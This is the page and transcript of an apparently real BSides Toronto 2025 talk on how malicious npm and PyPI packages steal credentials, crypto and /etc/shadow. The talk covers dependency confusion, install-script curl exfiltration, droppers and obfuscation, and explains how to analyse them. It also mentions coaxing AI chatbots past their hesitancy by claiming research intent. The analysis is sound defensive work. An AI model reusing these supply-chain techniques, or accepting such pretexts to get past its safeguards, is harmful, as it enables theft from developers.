Dissecting Open Source Malware: From PoCs to Payloads

Name: Dissecting Open Source Malware: From PoCs to Payloads
Uploaded: 2025-10-12
Duration: 25 min 54 s
Description: Juan Aguirre explores how open source packages in npm and PyPI have evolved from harmless proof-of-concepts into weaponized malware—credential stealers, backdoors, and remote access trojans distributed through legitimate-looking dependencies. The talk walks through real-world examples, obfuscation t

BSides Toronto · 202525:5492 viewsPublished 2025-10Watch on YouTube ↗

Speakers

Juan Aguirre

Tags

CategoryTechnical

TopicMalware Analysis Reverse Engineering Supply Chain Security

TeamRed

StyleTalk

About this talk

Juan Aguirre explores how open source packages in npm and PyPI have evolved from harmless proof-of-concepts into weaponized malware—credential stealers, backdoors, and remote access trojans distributed through legitimate-looking dependencies. The talk walks through real-world examples, obfuscation techniques, and practical workflows for analyzing these threats using static and dynamic analysis.

Show original YouTube description

Juan Aguirre poses the questions are malicious packages hiding in plain sight? Welcome to modern open source ecosystems. This talk explores how open source code—once limited to harmless PoCs and bug bounty tools—is increasingly being weaponized as real malware in the npm and PyPI ecosystems. We’ll walk through how these threats have evolved, dive into real examples, and show how you can analyze and understand them, even when they try to hide behind layers of obfuscation. Open source malware has rapidly evolved from harmless scripts into fully operational payloads, stealing credentials, exfiltrating data, dropping binaries and deploying RATs through packages that look just like any other dependency. In this talk, they explore that evolution and how attackers are using NPM and PyPI as distribution channels for info stealers, backdoors, and more. They demo a few real-world examples and walk through their approach to analyzing them, focusing on source-level static analysis with a touch of dynamic behaviour inspection in a controlled environment. They also look at some basic obfuscation techniques and show how to cut through them using simple but effective workflows. Whether you’re a developer, researcher, or just malware-curious, you’ll walk away with a better understanding of how these threats operate and how to start pulling them apart. Don’t trust your package.json or requirements.txt blindly. Get curious, dig in, and help raise the bar for supply chain security.

Show transcript [en]

Thank you. All right. Hello everybody. Thank you for sticking around. It's great to see you all here. Thank you Bides for having me. Uh so today we're going to be just diving in and talking about open source malware. Um just dissecting a little bit and seeing that evolution that I've been able to see while working from basic PC's to fully weaponized payloads. Uh and it's pretty cool. So let's dive in. Just first a quick who am I? My name is Juan Gir. I'm a security researcher currently at Safety CLI. Uh formerly PIUP.io. You might have heard of that one. Um I work mostly in supply chain security. The last couple of years I've been specializing on that. So I think

this last talk by uh Pav was actually a great segue right into this because you know we have some mention of sbombs as well. Um but mostly my sp my passion has always been offensive security and malware. I think that's where all the fun stuff is when you're in security. Um, there's a lot there's a lot to do, but offensive side is just so much fun. I also love leadership. I have a passion for that. And then outside of work, I just love being outside in nature, taking some hikes. Uh, I love that as much as I can, especially now in this fall era. It's great to see the colors. So, what is open source malware? Let's

first talk a little bit about that. And when we talk about the open- source space, we got to understand there's two basic roads of security impact. We have accidentally vulnerable, which is what we're more used to seeing, right? We see the CVE that's accidentally vulnerable, right? All these vulnerabilities that come out and affect open source, that's one avenue. uh and that is just a bug that was introduced in the code that has a security impact meaning it affects either the confidentiality, integrity or availability of a system or subsequent systems. And then we have the intentionally malicious which is pretty much the same thing. There's a bug that was introduced but now this was introduced on purpose to maliciously

affect one of these security impacts, right? Security triad, confidentiality, integrity and availability. So it might steal some information. and it might just break down the whole system, something like that. So, it's a malware that is intentionally published in an open source repository. And what are the motivations behind this? Well, we have bug bounty. That's a very popular one. Trolling. The amount of u rick rolls I've seen in malware is it's always funny to see when you open up a malware sample, you want to see what it is, and it's just uh you know what I'm talking about. is it's just like uh it opens up YouTube and there's Rick Ashley dancing away to uh you never

gonna give you apologize for my voice. Uh and then the fun ones monetization and espionage those are the truly good ones. So how does this get into my pipeline? How do they get into my system? Right. First let's talk about the initial compromise. So, how do these malicious packages, how do this malware get into an open source repository? And there's two avenues in there, two main ones. There's a lot more, but there's malicious from birth, meaning a malicious actor, created an account in one of these open source repositories, they created a package, and they published it from from birth, first version malicious. Sometimes they even do they hide they try to hide it a little bit. So, the

first couple of versions don't really do much. Maybe it does what the readme says it should do, but by the third or fourth version, you see they put in the payload. You see them inject malicious behavior, all that in there. And the other avenue is account takeovers, which have been very very popular. Account takeover is why does this happen? we have poor security either on the repository side like mpm we've seen some flaws with that in the past or even the developers the maintainers just have poor security don't rotate passwords don't have 2FA set up and then there's also namespace takeovers right so I in certain repositories I can have scope packages to a certain namespace which

give me a little bit more credibility so imagine I'm going to mpm um and I see a package that's microsoft/ /assure CLI that I see that I'm like, "Oh, that's probably legit. That looks more legit than anything." But it turns out I don't really need anything to claim that Microsoft name space right now. Of course, somebody has it. I'm not going to get Microsoft. That's too popular. But just as an example, if it wasn't claimed, I can just claim it. And you think that maybe I need a Microsoft domain account to authenticate it, but you don't. So you can just take the namespace and then start publishing your packages scoped so that they look pretty

uh legit. And then finally fishing. That's probably one of my favorite ones just cuz it it works so well. Social engineering it just works. You think by this time like day and age people have been a little more privy to it but at the end of the day these attacks are so well put together that it works right. We saw an example before where we saw like a a Microsoft login. They looked exactly identical and it's just so easy to follow. So now we have the package in the repository. How does it get into my pipeline? How does it get into my computer? And this does by a couple of avenues, but these are the two main

ones. Typo squads. So an attacker is going to leverage that, you know, we're rushing, we're writing our code, we're doing an npm install, we don't even look at the keyboard, we're just typing away. Maybe it's the morning, we haven't had our coffee or I'm not really a morning coffee. Morning. I'm sorry. I'm not really a coffee person, so maybe I haven't had my water or my Coke or like Coca-Cola Coke. Um, right. So, look at that, too. But then maybe I just fat fingered something and instead of writing colors.js, I forgot the dot and I put colors.js. Turns out that's a malicious package. So, there's very simple mistakes that I can make and a typo gets me a malicious package right

into my system. But there's also dependency confusion which we're going to talk a little bit more about later. But this just marked like a new era of avenues of possibilities. So dependency confusion leverages how these repository managers deal with public and private versions of a package and who takes presidents, right? Um and this just marked a new era. It flooded ecosystems and all that with dependency confusion. What really happens is that if there if you're using um a private package, so I work at safety. Let's say I have a package called safety-utils that we use internally and it's hosted in our private repository, right? If I do an npm install and it turns out that

somebody published that safety to npm as well, it's going to go and it's going to go fetch at npm and then after it'll look at my private one. But which one does it choose if it's available in both? Well, it turns out that it always lakes supposedly for security reasons the highest version one. So, this is where we started seeing a lot of attackers publish packages at 999.99.9, right? You see a version that looks crazy. It's like 999999.9 and this is the reason so that it makes sure to get it in your pipeline. And finally, it's in the pipeline. It's in my PC. How does it actually execute code? How does it put through that

malicious behavior it wants us to do? Um, and install scripts and setup scripts. That's the favorite uh like attackers bread and butter. They just they love this. So again, throwing some shade on npm. A lot of example mpm. Um, but like if I do an mpm install, I can have pre-install scripts in my package.json JSON or post install scripts that without me really noticing under the hood the script can run do the malicious behavior and it'll still install the package. So, you know, unbeknownst to me, I just got infected and I have no idea. Uh or also worm, they can spread uh which we saw this in September. This was awesome. If you haven't seen it, you can look it up. The

shy hallude attacks, you probably just that keyword. You can see a lot of it. Uh it compromised hundreds hundreds of packages. you know, Crowd Strike fell in there. So many organizations were affected. Um, and it was really cool because the way this was spreading was that it got a bunch of personal access tokens on GitHub. It would get on the repository, see what that access token had access to, what repositories, and would kind of clone itself on everything uh, and via GitHub actions do the same thing, just exfiltrate data. And it was just so easy, so fun. This is the GitHub action it actually used to ex excfiltrate the data which you see is just so simple. It's just pretty much a

curl to some web hook. Although it turns out the attackers didn't pay for the web hook. So they were using a free one. So it just like after a certain the first couple of tens hundreds of packages were affected, it just stopped responding because like oh you reached your your quote for the month, right? You got to pay it out. So if you're an attacker, make sure you use the paid version. Next, we got the evolution. So this is the real meat and bones of it. How does it go from PC's and bug bounties, which are essentially harmless, although we're going to see not all of them, to prankware and protestware, then to stealers, and eventually to

droppers and remote access Trojans, which are the real serious stuff, right? We're going to just dive right into some examples. So first we have the innocent stealer. This is kind of like the one of the first bug bounty PC's. This is the format they had. So this is a package.json for a package better help right 999.99.99. We see this from dependency confusion likely leanging that. And we see the pre-install script again right here. The pre-install is just a curl request right that's doing what? It's sending what out? It's sending on who am I. So like user ID, host name, and current working directory. So that's innocent enough. It's not really taking anything too sensitive. It's probably just enough for

me to claim my bounty and prove that hey, I can execute code in your system. But then we saw Alex Buren come out with like the dependency confusion. Shout out to Alex. Amazing research. This was back in like 2021, I want to say. I forget. Um but he put out this template which we see here is the same thing just that a little bit nicely written. So the package.json now has main index.js and this would be your index where it just has right a couple of imports requires um and then we have the tracking data that it's stealing home directory host name user. Again nothing too bad. And again it just makes a request to an

Osafi which is like a bird repeater. Just sends it out. get my bounty and I'm done. And it was actually funny because we saw some attackers that were really lazy after this flooding the ecosystems. Uh and Alex Buren had his like comments of like Alex Buran for security research purposes contact me if you see this. U and attackers were just copy pasting that and not even taking out the Alex Buren part. They just switched the URL to their own bird repeaters but they wouldn't even take the time to like hey let's remove this guy out of my PC. No, but you know, a quick bounty, I guess. But not all of them are so innocent. We

got some spicy ones, too, where they start to bring up the heat and it claims it's for security research purposes. But hey, when we look at line five, it's like, wait a minute, you're taking my shadow file, right? So why why are you going to take my shadow file? You just want to prove a bounty. That's, you know, that's a little bit over the limit. like I don't want my h password hashes just out there. That's a compromise. That's a serious risk. And then we got a lot of crypto stealers. This is something we see a lot. Crypto, that's the new currency of the internet and attackers love it, right? It's easy to launder, easy to

move around. And that's what we started seeing. This one was actually pretty fun because it didn't have really malicious code within the package, but it did have a link to a smart contract. So, we see the smart contract address right up here. So, you read this and you're like, hey, you know, it doesn't look too bad, but then you see the smart contract that it's pulling down and they were leveraging the smart contract to download that malicious code into your system. So, now the smart contract was executing malicious actions. So not all is as it seems and you got to be really careful with what you're putting into your systems. That's where the sbomb comes into play. Software bill

materials, you got to know what's going in there. Uh but then attackers are also right getting tired of being stopped and spotted all the time. So obuscation comes into play. How do I hide my intent a little bit so that researchers don't really see it, organizations don't really see it. How do I get by that? And we have some just basic ones. Um, this is probably like the main ones that we see. We see some encodings like B64, Route 13, UTF-16. One of my favorite ones was UTF-16 where I had a package that I had no idea what it was doing because it's this file that you can't really read and you put it through like online the offiscators and

it wasn't really getting me anything. Um, and then I saw like a Reddit post, you know, I was just like googling parts of the code and seeing what came up and I saw a Reddit post talk about UTF-16. So all I did was save that same file in my Sublime, my my notetaker, my whatever. Save it as UTF-16. Lo and behold, all of a sudden I have readable code. Turns out it's malicious. We see variable expansion, which we see this usually to hide like PowerShell commands. This is a fun one. I love when I see this because it's just like it's you I once you see it once or twice it's easy enough to recognize and then it's a

little bit fun to play around with it and you know it's like solving a puzzle. You just put the pieces together, substitute here or there and you get your PowerShell command that's probably pulling down an executable from somewhere. We see multiple eval chains. This is another fun one where you just see like an eval and this blob of unreadable things. like I have no idea what's happening there. But of course, I don't want to execute an eval. I I just don't want to do that. But it turns out if you replace the eval for a print or a console.log, I can reverse that. And then so you replace a print, run it in a safe

environment, of course, and I just get another eval with another big blob. Like, oh, wait a minute. So I replace the eval again for another print and I get another eval. But if you do that four or five times, eventually you end up with readable code. Just straight out malicious code, malicious intent. Variable renaming. This is where it gets a little bit more serious, right? String splitting, dynamic concatenation. These are the more of the true most common offiscation techniques that are really harder to get by. um or just droppers where you just see reaching out somewhere to a URL grabbing a binary which doesn't really have the source code download and execute how do we get how do we solve this

problem then right as a researcher as a malware analyst what do we do with these well we have a bunch of tools online there's those are some of favorites up there I'll share the slides afterwards as well u AI now with the boom of AI just why not leverage it for our benefit and it's been pretty good. I've had good results with both uh Chad GPT with Claude, they've been pretty good at, you know, you give it a package. Sometimes they're a bit hesitant to give you any answers on malicious code, but if you do a little bit of prompt engineering, you explain to it that, hey, you know, I'm a security researcher. I have good

intentions. It's like a little kid. It's just innocent. It lets you buy and it gives you all all you need. So, it helps you out. and they've been really good at figuring out what obuscated code is doing. Or dynamic analysis, put a safe environment together, a BM, put a debugger in there, you know, do something to trace logs, maybe do a fake net so you can see the network calls and simulate the environment more realistically. And that's a lot more fun to do. So we have this offiscated Brad here where we see the this line that's highlighted, right? It just says corecho and then bytes from hex something. We see in the imports that corkcho is

actually OS. They're importing system OS, right? They're trying to be smart and calling it coro. So that maybe some basic tools don't detect it. Maybe at the first look I don't really pay too much attention to it. But it turns out if I just copy that code, right, and I replace the cordo for a print, right, and I run that, I get what we see down here. That's again another curl to a paste bin. Anytime you see paste bin in in anything, you you immediately know, okay, I'm screwed. Turn everything off, unplug the cables, run, set it on fire, whatever. Right. So, this is a good one. And then this was actually what that pace bin was pulling down. So, remote

access trojan. It's pretty cool because it's written in Python. A lot of those just pull like a binary from somewhere. This one was actually pulling down the Python script. Uh, a couple of key things here. There's a lot of Spanish in it. P Spanish keywords, Spanish comments. But hey, if I'm a smart adversary, malicious actor, I might intentionally put it in Spanish without me knowing a single word of Spanish. Why? So that when someone is catching this and analyzing it, they're thinking, hey, attribution, probably a Spanish-sp speakaking country, and I'm on the other side of the world. So you can't take everything for what it is either, right? We see an offiscated crypto stealer. This is kind of like that uh variable

renamings, string splitting, and concatenation where I read this and I have no idea what's going on. I just don't. But I know it's likely not good. However, I do want to state that there is legitimate reasons to offiscate code. And offiscation does not mean malicious. There's a lot of organizations that just want to hide a little bit of business logic. They don't want to have it all in there. So, we're going to see what that example really looks like.

So let's log into my VM here.

So what I have here is I copied that the the offiscated code that we have. I put it into my VM. And the good thing about attaching a debugger to it is that if we're talking about node, you know, JavaScript, I can write the keyword debugger anywhere that looks interesting and it it puts a break point there. So it makes it easy for me, right? For time purposes, I'm going to kind of run through this a little bit quicker. So all I have to do is node inspect, which is a debugger. It's it's fun. It's easy. and then my JS file that I want to inspect and then it starts it attaches a debugger and I can do a lot of things

with it, right? I can go next. I can step into it with S. I can step out of it with O. I can just type C so it continues to the next um break point. So, we're going to start stepping over this a little bit and we we want to see what's going on. It's also good at the same time if you just have the code like somewhere here where you can follow along and if it says it's right we can see that the debugger is telling me hey you're on line six I can go see what line six kind of says and am I interested in that am I not we'll take a look

but eventually I get somewhere like this um the debugger this is my breakpoint but I want to go to the next one and show you the good one. So, I just keep stepping through it and I got to my next break point, line 472. So, if I go to line 472, it's like all these things are happening. Look at all these strings. What are what is that? I probably want to know. I want to find out. Um, and all this is doing is that up here up top, it's defining an array, which we see right here, and it's filling it with all these keywords and all these things. So, I want to know what that is. That looks

interesting. It looks important. So, I'm going to go and I'm going to kind of I have a little cheat note here so that it's easier for me. And I can do Excel.log log that I copy paste didn't work. So, let me just write it down. B A16 EF and the word is WG.

And I typed something wrong somewhere. So, let's try that again. BA 16 EF

underscore. Yes, thank you. So, there we go. What was that string? Turns out it's a Bitcoin Cash address. And there's a lot more in there. So, this was that smart contract stealer that I showed you before when it downloads a whole bunch of things. So it was looking for where transactions were happening, injecting itself in the middle and sending that to the attacker's wallet. So by doing this dynamic analysis when it's not really clear on what other avenues I have, this takes me there. So this is really good. So finally to close it off, this is kind of what the workflow kind of looks like. Do some deopiscation, see what I can find out. Static analysis should just

kind of be like my first avenue. Read the code. We're talking about open source. So we always have access to the code even if it's offiscated. Read the code. Take your time. Understand it. See what's happening. And then finally dynamic analysis in a safe environment. That's one of the most fun things to do. Just play around with the code. Run it. See what happens. Observe. That's half the fun of the research. What's next? Well, we're going to continue to blur the line between PC's and real threats. Every day it's thinner and thinner. We're going to see a lot of crypto stealers. This is just very popular and increasing sophistication in the attacks. It's just these remote access

Trojans every time get fancier and fancier with persistence mechanisms, anti-debug, a lot of things. Some of the key takeaways we need to understand here is that open source repos repositories are definitely part of the threat landscape. The supply chain is important. What we put into our code is very important, right? Since we're just using dependencies, it's very easy to do import something at the top and use it without even looking at it. But we need to trust and verify, right? Like you need to verify anything you're putting in there. Anyone can start analyzing these following that kind of basic workflow. Look at the code, play around with it, and it's good. So don't just trust your dependencies. Analyze,

verify, and contribute to keeping the system secure, the ecosystem secure. Thank you. Thank you, Juan. I think we have time for one question. No, doesn't like we don't have any question. Oh, there we go. Yes, go ahead. Do you have any advice for companies that might be new to securing their open

>> 100%. And so the question is what advice do we use for companies so that they can secure their systems a little bit? They don't have too much experience. I think our previous speaker hit it spot on. Software bureau materials. You need to know what you have in your code first. So that's kind of my start. I I know what's in there. I have a list of dependencies and things that I'm using. Um and then you know we can leverage these repository managers and all these other tools. There's SAS tools that can help me keep that up to date. can help me identify, hey, this dependency just got a CVE published. So, I probably want

to update it, see if there's any breaking changes. How do I update that? So, Software Bureau materials repository managers, so you're not doing everything manually. And just be mindful of what you're putting in your code. Awesome. Thank you everybody. And if there's more questions, maybe I'll be around. You can come up. >> Thank you. >> Thank you.

Dissecting Open Source Malware: From PoCs to Payloads

Related talks